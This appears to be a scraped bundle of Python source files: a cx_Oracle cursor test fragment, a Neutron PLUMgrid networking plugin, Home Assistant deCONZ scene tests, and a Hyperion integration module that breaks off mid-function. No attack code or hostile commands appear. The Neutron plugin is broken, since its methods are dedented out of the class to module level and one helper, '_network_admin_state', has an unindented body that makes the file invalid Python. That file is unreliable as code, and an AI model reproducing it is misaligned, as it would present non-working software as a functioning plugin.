
    def testSetInputSizesMultipleMethod(self):
        """test setting input sizes with both positional and keyword args"""
        self.failUnlessRaises(cx_Oracle.InterfaceError,
                self.cursor.setinputsizes, 5, x = 5)

    def testSetInputSizesByPosition(self):
        """test setting input sizes with positional args"""
        var = self.cursor.var(cx_Oracle.STRING, 100)
        self.cursor.setinputsizes(None, 5, None, 10, None, cx_Oracle.NUMBER)
        self.cursor.execute(u"""
                begin
                  :1 := :2 || to_char(:3) || :4 || to_char(:5) || to_char(:6);
                end;""", [var, u'test_', 5, u'_second_', 3, 7])
        self.failUnlessEqual(var.getvalue(), u"test_5_second_37")
| jayceyxc/hue | desktop/core/ext-py/cx_Oracle-5.2.1/test/uCursor.py | Python | apache-2.0 | 10,123 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Edgar Magana, emagana@plumgrid.com, PLUMgrid, Inc.
"""
Neutron Plug-in for PLUMgrid Virtual Networking Infrastructure (VNI)
This plugin will forward authenticated REST API calls
to the PLUMgrid Network Management System called Director
"""
import netaddr
from oslo.config import cfg
from sqlalchemy.orm import exc as sa_exc
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import db_base_plugin_v2
from neutron.db import external_net_db
from neutron.db import l3_db
from neutron.db import portbindings_db
from neutron.db import quota_db # noqa
from neutron.extensions import portbindings
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.plugins.plumgrid.common import exceptions as plum_excep
from neutron.plugins.plumgrid.plumgrid_plugin import plugin_ver
LOG = logging.getLogger(__name__)
# Configuration options describing how to reach the PLUMgrid Director,
# registered under the [plumgriddirector] group.
director_server_opts = [
    cfg.StrOpt('director_server', default='localhost',
               help=_("PLUMgrid Director server to connect to")),
    cfg.StrOpt('director_server_port', default='8080',
               help=_("PLUMgrid Director server port to connect to")),
    cfg.StrOpt('username', default='username',
               help=_("PLUMgrid Director admin username")),
    cfg.StrOpt('password', default='password', secret=True,
               help=_("PLUMgrid Director admin password")),
    cfg.IntOpt('servertimeout', default=5,
               help=_("PLUMgrid Director server timeout")),
    cfg.StrOpt('driver',
               default="neutron.plugins.plumgrid.drivers.plumlib.Plumlib",
               help=_("PLUMgrid Driver")), ]

cfg.CONF.register_opts(director_server_opts, "plumgriddirector")
class NeutronPluginPLUMgridV2(db_base_plugin_v2.NeutronDbPluginV2,
                              portbindings_db.PortBindingMixin,
                              external_net_db.External_net_db_mixin,
                              l3_db.L3_NAT_db_mixin):
    """Neutron core plugin that forwards API calls to a PLUMgrid Director."""

    # API extensions this plugin advertises.
    supported_extension_aliases = ["external-net", "router", "binding",
                                   "quotas", "provider"]

    # Policy actions for the port-binding extension.
    binding_view = "extension:port_binding:view"
    binding_set = "extension:port_binding:set"
def __init__(self):
    """Initialize the plugin and connect to the PLUMgrid Director."""
    LOG.info(_('Neutron PLUMgrid Director: Starting Plugin'))

    super(NeutronPluginPLUMgridV2, self).__init__()

    # Establish the Director connection before serving any requests.
    self.plumgrid_init()

    LOG.debug(_('Neutron PLUMgrid Director: Neutron server with '
                'PLUMgrid Plugin has started'))
def plumgrid_init(self):
    """PLUMgrid initialization."""
    director_plumgrid = cfg.CONF.plumgriddirector.director_server
    director_port = cfg.CONF.plumgriddirector.director_server_port
    director_admin = cfg.CONF.plumgriddirector.username
    director_password = cfg.CONF.plumgriddirector.password
    timeout = cfg.CONF.plumgriddirector.servertimeout
    plum_driver = cfg.CONF.plumgriddirector.driver

    # PLUMgrid Director info validation
    LOG.info(_('Neutron PLUMgrid Director: %s'), director_plumgrid)
    # The library driver is configurable so deployments/tests can
    # substitute an alternative implementation.
    self._plumlib = importutils.import_object(plum_driver)
    self._plumlib.director_conn(director_plumgrid, director_port, timeout,
                                director_admin, director_password)
def create_network(self, context, network):
    """Create Neutron network.

    Creates a PLUMgrid-based bridge.
    """
    LOG.debug(_('Neutron PLUMgrid Director: create_network() called'))

    # Plugin DB - Network Create and validation
    tenant_id = self._get_tenant_id_for_create(context,
                                               network["network"])
    # Only warns: admin_state_up=False is not supported by the plugin.
    self._network_admin_state(network)

    with context.session.begin(subtransactions=True):
        net_db = super(NeutronPluginPLUMgridV2,
                       self).create_network(context, network)
        # Propagate all L3 data into DB
        self._process_l3_create(context, net_db, network['network'])

        try:
            LOG.debug(_('PLUMgrid Library: create_network() called'))
            self._plumlib.create_network(tenant_id, net_db, network)

        except Exception as err_message:
            # Raising inside the transaction rolls the DB create back,
            # keeping Neutron and the Director consistent.
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Return created network
    return net_db
def update_network(self, context, net_id, network):
    """Update Neutron network.

    Updates a PLUMgrid-based bridge.
    """
    LOG.debug(_("Neutron PLUMgrid Director: update_network() called"))
    self._network_admin_state(network)
    tenant_id = self._get_tenant_id_for_create(context, network["network"])

    with context.session.begin(subtransactions=True):
        # Plugin DB - Network Update
        net_db = super(
            NeutronPluginPLUMgridV2, self).update_network(context,
                                                          net_id, network)
        self._process_l3_update(context, net_db, network['network'])

        try:
            LOG.debug(_("PLUMgrid Library: update_network() called"))
            self._plumlib.update_network(tenant_id, net_id)

        except Exception as err_message:
            # Roll the DB update back if the Director rejects the change.
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Return updated network
    return net_db
def delete_network(self, context, net_id):
    """Delete Neutron network.

    Deletes a PLUMgrid-based bridge.

    :param context: neutron request context
    :param net_id: UUID of the network to delete
    :raises plum_excep.PLUMgridException: if the Director call fails
    """
    LOG.debug(_("Neutron PLUMgrid Director: delete_network() called"))
    # Fetch the record before deletion so it can still be handed to the
    # PLUMgrid library afterwards.
    net_db = super(NeutronPluginPLUMgridV2,
                   self).get_network(context, net_id)

    with context.session.begin(subtransactions=True):
        self._process_l3_delete(context, net_id)
        # Plugin DB - Network Delete
        super(NeutronPluginPLUMgridV2, self).delete_network(context,
                                                            net_id)

        try:
            # Fixed log message: this is the delete path (it previously
            # logged "update_network() called").
            LOG.debug(_("PLUMgrid Library: delete_network() called"))
            self._plumlib.delete_network(net_db, net_id)

        except Exception as err_message:
            # Raising inside the transaction rolls the DB delete back.
            raise plum_excep.PLUMgridException(err_msg=err_message)
def create_port(self, context, port):
    """Create Neutron port.

    Creates a PLUMgrid-based port on the specific Virtual Network
    Function (VNF).
    """
    LOG.debug(_("Neutron PLUMgrid Director: create_port() called"))

    # Port operations on PLUMgrid Director is an automatic operation
    # from the VIF driver operations in Nova.
    # It requires admin_state_up to be True
    port["port"]["admin_state_up"] = True

    with context.session.begin(subtransactions=True):
        # Plugin DB - Port Create and Return port
        port_db = super(NeutronPluginPLUMgridV2, self).create_port(context,
                                                                   port)
        device_id = port_db["device_id"]
        if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
            # Router gateway ports also need their router record so the
            # Director can wire the uplink.
            router_db = self._get_router(context, device_id)
        else:
            router_db = None
        try:
            LOG.debug(_("PLUMgrid Library: create_port() called"))
            self._plumlib.create_port(port_db, router_db)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Plugin DB - Port Create and Return port
    return self._port_viftype_binding(context, port_db)
def update_port(self, context, port_id, port):
    """Update Neutron port.

    Updates a PLUMgrid-based port on the specific Virtual Network
    Function (VNF).

    :param context: neutron request context
    :param port_id: UUID of the port being updated
    :param port: dict carrying the updated port attributes
    :raises plum_excep.PLUMgridException: if the Director call fails
    """
    LOG.debug(_("Neutron PLUMgrid Director: update_port() called"))

    with context.session.begin(subtransactions=True):
        # Plugin DB - Port Update
        port_db = super(NeutronPluginPLUMgridV2, self).update_port(
            context, port_id, port)
        device_id = port_db["device_id"]
        if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
            # Router gateway ports also need their router record so the
            # Director can wire the uplink.
            router_db = self._get_router(context, device_id)
        else:
            router_db = None
        try:
            # Fixed log message: this is the update path (it previously
            # logged "create_port() called").
            LOG.debug(_("PLUMgrid Library: update_port() called"))
            self._plumlib.update_port(port_db, router_db)

        except Exception as err_message:
            # Raising inside the transaction rolls the DB update back.
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Plugin DB - Port Update
    return self._port_viftype_binding(context, port_db)
def delete_port(self, context, port_id, l3_port_check=True):
    """Delete Neutron port.

    Deletes a PLUMgrid-based port on the specific Virtual Network
    Function (VNF).
    """
    # NOTE(review): l3_port_check is accepted for API compatibility but
    # is not acted upon here -- confirm this is intentional.
    LOG.debug(_("Neutron PLUMgrid Director: delete_port() called"))

    with context.session.begin(subtransactions=True):
        # Plugin DB - Port Create and Return port
        port_db = super(NeutronPluginPLUMgridV2,
                        self).get_port(context, port_id)
        # Release floating IPs bound to this port before it disappears.
        self.disassociate_floatingips(context, port_id)
        super(NeutronPluginPLUMgridV2, self).delete_port(context, port_id)

        if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
            device_id = port_db["device_id"]
            router_db = self._get_router(context, device_id)
        else:
            router_db = None
        try:
            LOG.debug(_("PLUMgrid Library: delete_port() called"))
            self._plumlib.delete_port(port_db, router_db)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
def get_port(self, context, id, fields=None):
    """Return one port with the VIF binding attributes populated."""
    with context.session.begin(subtransactions=True):
        port_db = super(NeutronPluginPLUMgridV2,
                        self).get_port(context, id, fields)

        self._port_viftype_binding(context, port_db)
    return self._fields(port_db, fields)
def get_ports(self, context, filters=None, fields=None):
    """Return matching ports, each with VIF binding attributes populated."""
    with context.session.begin(subtransactions=True):
        ports_db = super(NeutronPluginPLUMgridV2,
                         self).get_ports(context, filters, fields)
        for port_db in ports_db:
            self._port_viftype_binding(context, port_db)
    return [self._fields(port, fields) for port in ports_db]
def create_subnet(self, context, subnet):
    """Create Neutron subnet.

    Creates a PLUMgrid-based DHCP and NAT Virtual Network
    Functions (VNFs).
    """
    LOG.debug(_("Neutron PLUMgrid Director: create_subnet() called"))

    with context.session.begin(subtransactions=True):
        # Plugin DB - Subnet Create
        net_db = super(NeutronPluginPLUMgridV2, self).get_network(
            context, subnet['subnet']['network_id'], fields=None)
        s = subnet['subnet']
        ipnet = netaddr.IPNetwork(s['cidr'])

        # PLUMgrid Director reserves the last IP address for GW
        # when is not defined
        # NOTE(review): this check uses 'is' while the pools check below
        # uses '==' against the same sentinel -- confirm both are intended.
        if s['gateway_ip'] is attributes.ATTR_NOT_SPECIFIED:
            gw_ip = str(netaddr.IPAddress(ipnet.last - 1))
            subnet['subnet']['gateway_ip'] = gw_ip

        # PLUMgrid reserves the first IP
        if s['allocation_pools'] == attributes.ATTR_NOT_SPECIFIED:
            allocation_pool = self._allocate_pools_for_subnet(context, s)
            subnet['subnet']['allocation_pools'] = allocation_pool

        sub_db = super(NeutronPluginPLUMgridV2, self).create_subnet(
            context, subnet)

        try:
            LOG.debug(_("PLUMgrid Library: create_subnet() called"))
            self._plumlib.create_subnet(sub_db, net_db, ipnet)
        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
    return sub_db
def delete_subnet(self, context, subnet_id):
    """Delete subnet core Neutron API."""
    LOG.debug(_("Neutron PLUMgrid Director: delete_subnet() called"))
    # Collecting subnet info
    sub_db = self._get_subnet(context, subnet_id)
    # NOTE(review): subnet_id (a string) is passed where other call sites
    # pass a resource dict -- confirm _get_tenant_id_for_create handles it.
    tenant_id = self._get_tenant_id_for_create(context, subnet_id)
    net_id = sub_db["network_id"]
    net_db = self.get_network(context, net_id)

    with context.session.begin(subtransactions=True):
        # Plugin DB - Subnet Delete
        super(NeutronPluginPLUMgridV2, self).delete_subnet(
            context, subnet_id)
        try:
            LOG.debug(_("PLUMgrid Library: delete_subnet() called"))
            self._plumlib.delete_subnet(tenant_id, net_db, net_id)
        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
def update_subnet(self, context, subnet_id, subnet):
    """Update subnet core Neutron API.

    :param context: neutron request context
    :param subnet_id: UUID of the subnet being updated
    :param subnet: dict carrying the updated subnet attributes
    :raises plum_excep.PLUMgridException: if the Director call fails
    """
    LOG.debug(_("update_subnet() called"))
    # Collecting subnet info
    orig_sub_db = self._get_subnet(context, subnet_id)

    with context.session.begin(subtransactions=True):
        # Plugin DB - Subnet Update
        new_sub_db = super(NeutronPluginPLUMgridV2,
                           self).update_subnet(context, subnet_id, subnet)
        ipnet = netaddr.IPNetwork(new_sub_db['cidr'])

        try:
            # PLUMgrid Server does not support updating resources yet
            # Fixed log message: this is the subnet path (it previously
            # logged "update_network() called").
            LOG.debug(_("PLUMgrid Library: update_subnet() called"))
            self._plumlib.update_subnet(orig_sub_db, new_sub_db, ipnet)

        except Exception as err_message:
            # Raising inside the transaction rolls the DB update back.
            raise plum_excep.PLUMgridException(err_msg=err_message)

    return new_sub_db
def create_router(self, context, router):
    """Create router extension Neutron API."""
    LOG.debug(_("Neutron PLUMgrid Director: create_router() called"))

    tenant_id = self._get_tenant_id_for_create(context, router["router"])

    with context.session.begin(subtransactions=True):
        # Create router in DB
        router_db = super(NeutronPluginPLUMgridV2,
                          self).create_router(context, router)
        # Create router on the network controller
        try:
            # Add Router to VND
            LOG.debug(_("PLUMgrid Library: create_router() called"))
            self._plumlib.create_router(tenant_id, router_db)
        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Return created router
    return router_db
def update_router(self, context, router_id, router):
    """Update router extension Neutron API."""
    LOG.debug(_("Neutron PLUMgrid Director: update_router() called"))

    with context.session.begin(subtransactions=True):
        router_db = super(NeutronPluginPLUMgridV2,
                          self).update_router(context, router_id, router)
        try:
            LOG.debug(_("PLUMgrid Library: update_router() called"))
            self._plumlib.update_router(router_db, router_id)
        except Exception as err_message:
            # Raising inside the transaction rolls the DB update back.
            raise plum_excep.PLUMgridException(err_msg=err_message)

    # Return updated router
    return router_db
def delete_router(self, context, router_id):
    """Delete router extension Neutron API."""
    LOG.debug(_("Neutron PLUMgrid Director: delete_router() called"))

    with context.session.begin(subtransactions=True):
        # Capture tenant before the base class removes the record.
        orig_router = self._get_router(context, router_id)
        tenant_id = orig_router["tenant_id"]

        super(NeutronPluginPLUMgridV2, self).delete_router(context,
                                                           router_id)

        try:
            LOG.debug(_("PLUMgrid Library: delete_router() called"))
            self._plumlib.delete_router(tenant_id, router_id)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
def add_router_interface(self, context, router_id, interface_info):
    """Attach a subnet or port to a router (router extension API)."""
    LOG.debug(_("Neutron PLUMgrid Director: "
                "add_router_interface() called"))
    with context.session.begin(subtransactions=True):
        # Validate args
        router_db = self._get_router(context, router_id)
        tenant_id = router_db['tenant_id']

        # Create interface in DB
        int_router = super(NeutronPluginPLUMgridV2,
                           self).add_router_interface(context,
                                                      router_id,
                                                      interface_info)

        # Resolve the interface port and its subnet/CIDR for the Director.
        port_db = self._get_port(context, int_router['port_id'])
        subnet_id = port_db["fixed_ips"][0]["subnet_id"]
        subnet_db = super(NeutronPluginPLUMgridV2,
                          self)._get_subnet(context, subnet_id)
        ipnet = netaddr.IPNetwork(subnet_db['cidr'])

        # Create interface on the network controller
        try:
            LOG.debug(_("PLUMgrid Library: add_router_interface() called"))
            self._plumlib.add_router_interface(tenant_id, router_id,
                                               port_db, ipnet)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)

    return int_router
def remove_router_interface(self, context, router_id, int_info):
    """Detach a subnet or port from a router (router extension API)."""
    LOG.debug(_("Neutron PLUMgrid Director: "
                "remove_router_interface() called"))
    with context.session.begin(subtransactions=True):
        # Validate args
        router_db = self._get_router(context, router_id)
        tenant_id = router_db['tenant_id']
        if 'port_id' in int_info:
            port = self._get_port(context, int_info['port_id'])
            net_id = port['network_id']

        elif 'subnet_id' in int_info:
            subnet_id = int_info['subnet_id']
            subnet = self._get_subnet(context, subnet_id)
            net_id = subnet['network_id']
        # NOTE(review): net_id stays unbound when int_info carries neither
        # 'port_id' nor 'subnet_id' -- confirm callers always pass one.

        # Remove router in DB
        del_int_router = super(NeutronPluginPLUMgridV2,
                               self).remove_router_interface(context,
                                                             router_id,
                                                             int_info)

        try:
            LOG.debug(_("PLUMgrid Library: "
                        "remove_router_interface() called"))
            self._plumlib.remove_router_interface(tenant_id,
                                                  net_id, router_id)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)

    return del_int_router
def create_floatingip(self, context, floatingip):
    """Create a floating IP (L3 extension API)."""
    LOG.debug(_("Neutron PLUMgrid Director: create_floatingip() called"))

    with context.session.begin(subtransactions=True):
        floating_ip = super(NeutronPluginPLUMgridV2,
                            self).create_floatingip(context, floatingip)
        try:
            LOG.debug(_("PLUMgrid Library: create_floatingip() called"))
            self._plumlib.create_floatingip(floating_ip)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
    return floating_ip
def update_floatingip(self, context, id, floatingip):
    """Update a floating IP (L3 extension API)."""
    LOG.debug(_("Neutron PLUMgrid Director: update_floatingip() called"))

    with context.session.begin(subtransactions=True):
        # Fetch the pre-update record so the driver sees both the old
        # and the new association.
        floating_ip_orig = super(NeutronPluginPLUMgridV2,
                                 self).get_floatingip(context, id)
        floating_ip = super(NeutronPluginPLUMgridV2,
                            self).update_floatingip(context, id,
                                                    floatingip)
        try:
            LOG.debug(_("PLUMgrid Library: update_floatingip() called"))
            self._plumlib.update_floatingip(floating_ip_orig, floating_ip,
                                            id)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
    return floating_ip
def delete_floatingip(self, context, id):
    """Delete a floating IP (L3 extension API)."""
    LOG.debug(_("Neutron PLUMgrid Director: delete_floatingip() called"))

    with context.session.begin(subtransactions=True):
        # Look the record up before the base class removes it.
        floating_ip_orig = super(NeutronPluginPLUMgridV2,
                                 self).get_floatingip(context, id)

        super(NeutronPluginPLUMgridV2, self).delete_floatingip(context, id)

        try:
            LOG.debug(_("PLUMgrid Library: delete_floatingip() called"))
            self._plumlib.delete_floatingip(floating_ip_orig, id)

        except Exception as err_message:
            raise plum_excep.PLUMgridException(err_msg=err_message)
def disassociate_floatingips(self, context, port_id):
    """Disassociate any floating IP currently bound to port_id."""
    LOG.debug(_("Neutron PLUMgrid Director: disassociate_floatingips() "
                "called"))

    try:
        fip_qry = context.session.query(l3_db.FloatingIP)
        floating_ip = fip_qry.filter_by(fixed_port_id=port_id).one()

        LOG.debug(_("PLUMgrid Library: disassociate_floatingips()"
                    " called"))
        self._plumlib.disassociate_floatingips(floating_ip, port_id)

    except sa_exc.NoResultFound:
        # No floating IP is attached to this port; nothing to undo.
        pass

    except Exception as err_message:
        raise plum_excep.PLUMgridException(err_msg=err_message)

    super(NeutronPluginPLUMgridV2,
          self).disassociate_floatingips(context, port_id)
"""
Internal PLUMgrid Fuctions
"""
def _get_plugin_version(self):
    """Return the PLUMgrid plugin version string."""
    return plugin_ver.VERSION
def _port_viftype_binding(self, context, port):
    """Populate the portbindings extension attributes on the port dict."""
    port[portbindings.VIF_TYPE] = portbindings.VIF_TYPE_IOVISOR
    port[portbindings.VIF_DETAILS] = {
        # TODO(rkukura): Replace with new VIF security details
        portbindings.CAP_PORT_FILTER:
        'security-group' in self.supported_extension_aliases}
    return port
def _network_admin_state(self, network):
if network["network"].get("admin_state_up") is False:
LOG.warning(_("Networks with admin_state_up=False are not "
"supported by PLUMgrid plugin yet."))
return network
def _allocate_pools_for_subnet(self, context, subnet):
    """Create IP allocation pools for a given subnet

    Pools are defined by the 'allocation_pools' attribute,
    a list of dict objects with 'start' and 'end' keys for
    defining the pool range.
    Modified from Neutron DB based class
    """
    # NOTE(review): context is unused here; kept for signature parity
    # with the base-class implementation.
    pools = []
    # Auto allocate the pool around gateway_ip
    net = netaddr.IPNetwork(subnet['cidr'])
    # Skip the network address and the first host address (reserved by
    # PLUMgrid); exclude the broadcast address at the top.
    first_ip = net.first + 2
    last_ip = net.last - 1
    gw_ip = int(netaddr.IPAddress(subnet['gateway_ip'] or net.last))
    # Use the gw_ip to find a point for splitting allocation pools
    # for this subnet
    split_ip = min(max(gw_ip, net.first), net.last)
    if split_ip > first_ip:
        pools.append({'start': str(netaddr.IPAddress(first_ip)),
                      'end': str(netaddr.IPAddress(split_ip - 1))})
    if split_ip < last_ip:
        pools.append({'start': str(netaddr.IPAddress(split_ip + 1)),
                      'end': str(netaddr.IPAddress(last_ip))})
    # return auto-generated pools
    # no need to check for their validity
    return pools
| subramani95/neutron | neutron/plugins/plumgrid/plumgrid_plugin/plumgrid_plugin.py | Python | apache-2.0 | 24,717 |
"""deCONZ scene platform tests."""
from copy import deepcopy
from asynctest import patch
from homeassistant.components import deconz
from homeassistant.setup import async_setup_component
import homeassistant.components.scene as scene
from .test_gateway import ENTRY_CONFIG, DECONZ_WEB_REQUEST, setup_deconz_integration
GROUPS = {
"1": {
"id": "Light group id",
"name": "Light group",
"type": "LightGroup",
"state": {"all_on": False, "any_on": True},
"action": {},
"scenes": [{"id": "1", "name": "Scene"}],
"lights": [],
}
}
async def test_platform_manually_configured(hass):
    """Test that we do not discover anything or try to set up a gateway."""
    assert (
        await async_setup_component(
            hass, scene.DOMAIN, {"scene": {"platform": deconz.DOMAIN}}
        )
        is True
    )
    # Manual YAML platform configuration must not create deCONZ state.
    assert deconz.DOMAIN not in hass.data
async def test_no_scenes(hass):
    """Test that scenes can be loaded without scenes being available."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    gateway = await setup_deconz_integration(
        hass, ENTRY_CONFIG, options={}, get_state_response=data
    )
    # The default fixture carries no groups, hence no scene entities.
    assert len(gateway.deconz_ids) == 0
    assert len(hass.states.async_all()) == 0
async def test_scenes(hass):
    """Test that scenes works."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["groups"] = deepcopy(GROUPS)
    gateway = await setup_deconz_integration(
        hass, ENTRY_CONFIG, options={}, get_state_response=data
    )

    assert "scene.light_group_scene" in gateway.deconz_ids
    assert len(hass.states.async_all()) == 1

    light_group_scene = hass.states.get("scene.light_group_scene")
    assert light_group_scene

    # Activating the scene must recall group 1 / scene 1 on the gateway.
    group_scene = gateway.api.groups["1"].scenes["1"]

    with patch.object(
        group_scene, "_async_set_state_callback", return_value=True
    ) as set_callback:
        await hass.services.async_call(
            "scene", "turn_on", {"entity_id": "scene.light_group_scene"}, blocking=True
        )
        await hass.async_block_till_done()
        set_callback.assert_called_with("/groups/1/scenes/1/recall", {})

    # Resetting the gateway removes all of its entities again.
    await gateway.async_reset()

    assert len(hass.states.async_all()) == 0
| joopert/home-assistant | tests/components/deconz/test_scene.py | Python | apache-2.0 | 2,229 |
"""The Hyperion component."""
from __future__ import annotations
import asyncio
from contextlib import suppress
import logging
from typing import Any, Callable, cast
from awesomeversion import AwesomeVersion
from hyperion import client, const as hyperion_const
from homeassistant.components.camera.const import DOMAIN as CAMERA_DOMAIN
from homeassistant.components.light import DOMAIN as LIGHT_DOMAIN
from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_HOST, CONF_PORT, CONF_TOKEN
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.typing import ConfigType
from .const import (
CONF_INSTANCE_CLIENTS,
CONF_ON_UNLOAD,
CONF_ROOT_CLIENT,
DEFAULT_NAME,
DOMAIN,
HYPERION_RELEASES_URL,
HYPERION_VERSION_WARN_CUTOFF,
SIGNAL_INSTANCE_ADD,
SIGNAL_INSTANCE_REMOVE,
)
PLATFORMS = [LIGHT_DOMAIN, SWITCH_DOMAIN, CAMERA_DOMAIN]
_LOGGER = logging.getLogger(__name__)
# Unique ID
# =========
# A config entry represents a connection to a single Hyperion server. The config entry
# unique_id is the server id returned from the Hyperion instance (a unique ID per
# server).
#
# Each server connection may create multiple entities. The unique_id for each entity is
# <server id>_<instance #>_<name>, where <server_id> will be the unique_id on the
# relevant config entry (as above), <instance #> will be the server instance # and
# <name> will be a unique identifying type name for each entity associated with this
# server/instance (e.g. "hyperion_light").
#
# The get_hyperion_unique_id method will create a per-entity unique id when given the
# server id, an instance number and a name.
# hass.data format
# ================
#
# hass.data[DOMAIN] = {
# <config_entry.entry_id>: {
# "ROOT_CLIENT": <Hyperion Client>,
# "ON_UNLOAD": [<callable>, ...],
# }
# }
def get_hyperion_unique_id(server_id: str, instance: int, name: str) -> str:
    """Build the per-entity unique_id: "<server id>_<instance>_<name>"."""
    return "_".join((server_id, str(instance), name))
def get_hyperion_device_id(server_id: str, instance: int) -> str:
    """Build the device id for a Hyperion instance: "<server id>_<instance>"."""
    return "_".join((server_id, str(instance)))
def split_hyperion_unique_id(unique_id: str) -> tuple[str, int, str] | None:
    """Split a unique_id into a (server_id, instance, type) tuple.

    Returns None when the id does not have three "_"-separated parts or
    the instance component is not an integer.
    """
    parts = unique_id.split("_", 2)
    if len(parts) != 3:
        return None
    server_id, instance_str, type_name = parts
    try:
        return server_id, int(instance_str), type_name
    except ValueError:
        return None
def create_hyperion_client(
    *args: Any,
    **kwargs: Any,
) -> client.HyperionClient:
    """Create a Hyperion Client."""
    # NOTE(review): thin factory around HyperionClient -- presumably kept
    # as an indirection point so tests can patch client creation; confirm.
    return client.HyperionClient(*args, **kwargs)
async def async_create_connect_hyperion_client(
    *args: Any,
    **kwargs: Any,
) -> client.HyperionClient | None:
    """Create and connect a Hyperion Client.

    Returns None when the client cannot establish a connection.
    """
    hyperion_client = create_hyperion_client(*args, **kwargs)
    if not await hyperion_client.async_client_connect():
        return None
    return hyperion_client
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Set up Hyperion component."""
    # Per-config-entry storage; populated later by async_setup_entry.
    hass.data[DOMAIN] = {}
    return True
@callback
def listen_for_instance_updates(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    add_func: Callable,
    remove_func: Callable,
) -> None:
    """Listen for instance additions/removals.

    The dispatcher disconnect callables are stored under CONF_ON_UNLOAD
    so async_unload_entry can clean them up.
    """
    hass.data[DOMAIN][config_entry.entry_id][CONF_ON_UNLOAD].extend(
        [
            async_dispatcher_connect(
                hass,
                SIGNAL_INSTANCE_ADD.format(config_entry.entry_id),
                add_func,
            ),
            async_dispatcher_connect(
                hass,
                SIGNAL_INSTANCE_REMOVE.format(config_entry.entry_id),
                remove_func,
            ),
        ]
    )
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Set up Hyperion from a config entry."""
    host = entry.data[CONF_HOST]
    port = entry.data[CONF_PORT]
    token = entry.data.get(CONF_TOKEN)

    hyperion_client = await async_create_connect_hyperion_client(
        host, port, token=token, raw_connection=True
    )

    # Client won't connect? => Not ready.
    if not hyperion_client:
        raise ConfigEntryNotReady
    version = await hyperion_client.async_sysinfo_version()
    if version is not None:
        with suppress(ValueError):
            if AwesomeVersion(version) < AwesomeVersion(HYPERION_VERSION_WARN_CUTOFF):
                _LOGGER.warning(
                    "Using a Hyperion server version < %s is not recommended -- "
                    "some features may be unavailable or may not function correctly. "
                    "Please consider upgrading: %s",
                    HYPERION_VERSION_WARN_CUTOFF,
                    HYPERION_RELEASES_URL,
                )

    # Client needs authentication, but no token provided? => Reauth.
    auth_resp = await hyperion_client.async_is_auth_required()
    if (
        auth_resp is not None
        and client.ResponseOK(auth_resp)
        and auth_resp.get(hyperion_const.KEY_INFO, {}).get(
            hyperion_const.KEY_REQUIRED, False
        )
        and token is None
    ):
        await hyperion_client.async_client_disconnect()
        raise ConfigEntryAuthFailed

    # Client login doesn't work? => Reauth.
    if not await hyperion_client.async_client_login():
        await hyperion_client.async_client_disconnect()
        raise ConfigEntryAuthFailed

    # Cannot switch instance or cannot load state? => Not ready.
    if (
        not await hyperion_client.async_client_switch_instance()
        or not client.ServerInfoResponseOK(await hyperion_client.async_get_serverinfo())
    ):
        await hyperion_client.async_client_disconnect()
        raise ConfigEntryNotReady

    # We need 1 root client (to manage instances being removed/added) and then 1 client
    # per Hyperion server instance which is shared for all entities associated with
    # that instance.
    hass.data[DOMAIN][entry.entry_id] = {
        CONF_ROOT_CLIENT: hyperion_client,
        CONF_INSTANCE_CLIENTS: {},
        CONF_ON_UNLOAD: [],
    }

    async def async_instances_to_clients(response: dict[str, Any]) -> None:
        """Convert instances to Hyperion clients."""
        if not response or hyperion_const.KEY_DATA not in response:
            return
        await async_instances_to_clients_raw(response[hyperion_const.KEY_DATA])

    async def async_instances_to_clients_raw(instances: list[dict[str, Any]]) -> None:
        """Convert instances to Hyperion clients."""
        device_registry = dr.async_get(hass)
        running_instances: set[int] = set()
        stopped_instances: set[int] = set()
        existing_instances = hass.data[DOMAIN][entry.entry_id][CONF_INSTANCE_CLIENTS]
        server_id = cast(str, entry.unique_id)

        # In practice, an instance can be in 3 states as seen by this function:
        #
        # * Exists, and is running: Should be present in HASS/registry.
        # * Exists, but is not running: Cannot add it yet, but entity may have
        #   been registered from a previous time it was running.
        # * No longer exists at all: Should not be present in HASS/registry.

        # Add instances that are missing.
        for instance in instances:
            instance_num = instance.get(hyperion_const.KEY_INSTANCE)
            if instance_num is None:
                continue
            if not instance.get(hyperion_const.KEY_RUNNING, False):
                stopped_instances.add(instance_num)
                continue
